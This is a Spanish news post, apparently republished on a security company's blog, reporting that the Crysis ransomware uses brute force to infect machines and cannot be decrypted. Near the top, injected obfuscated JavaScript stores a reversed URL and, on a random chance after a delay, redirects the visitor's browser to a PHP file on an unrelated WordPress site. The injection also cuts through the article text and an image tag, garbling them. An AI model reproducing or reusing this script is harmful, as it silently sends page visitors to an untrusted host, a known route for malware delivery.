El ransomware Crysis emplea la fuerza bruta para infectar equipos
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-de-teslacrypt.jpg?x=634&y=309″ alt=”” width=”634″ height=”309″ /></p>
<p>Aunque apareció por primera vez a principios de este mismo año, los ciberdelincuentes han re<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tomado la difusión de esta amenaza. Sin ir más lejos, sus propietarios lo han dotado de un algortimo de fuerza bruta que será utilizado por Crysis para acceder a los equipos y así conseguir llevar a cabo la infección de forma satisfactoria.
En un principio se barajó la posibilidad por parte de expertos en seguridad y los propietarios de la misma de ocupar el lugar que había dejado TeslaCrypt, uno de los ransomware referentes. Sin embargo, podría decirse que la operación fue todo un fracaso, sobre todo porque aparecieron varias que compitieron y al final se hicieron con el hueco, como es el caso de Cerber o CryptXXX.
La forma de difusión de la amenaza no era otra que la infección de páginas web legítimas para posteriormente distribuir la amenaza o bien el envío de correos electrónicos spam cuyo archivo adjunto era nada más y nada menos que el instalador de la amenaza que nos ocupa.
Se trata de dos métodos de difusión de amenazas muy utilizados por los ciberdelincuentes, pero también muy conocidos por los propios usuarios, de ahí que si no se dispone de un plan alternativo es probable que la operación termine siendo un auténtico fracaso.
¿Por qué Crysis ha sido equipado con un algoritmo de fuerza bruta?
Obviamente para potenciar su poder. Tanto es el impacto de esta prestación introducida que a día de hoy no existe ninguna forma de recuperar los archivos afectados por esta amenaza. No se trata de algo nuevo en el mundo ransomware, ya que con anterioridad otros también hicieron uso de esta técnica, como por ejemplo LowLevel, DMA Locker o Smrss32, entre otros.
El cifrado resultado es una combinación de algoritmos AES y RSA, de ahí que los expertos en seguridad hayan recomendado emplear copias de seguridad, ya que de lo contrario no se podrá hacer uso de una herramienta gratuita para proceder a la recuperación de la información, o al menos de momento.
–
Ver información original al respecto en Fuente:
http://www.redeszone.net/2016/09/20/ransomware-crysis-emplea-la-fuerza-bruta-infectar-equipos/#sthash.EmfoCQd4.dpuf
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.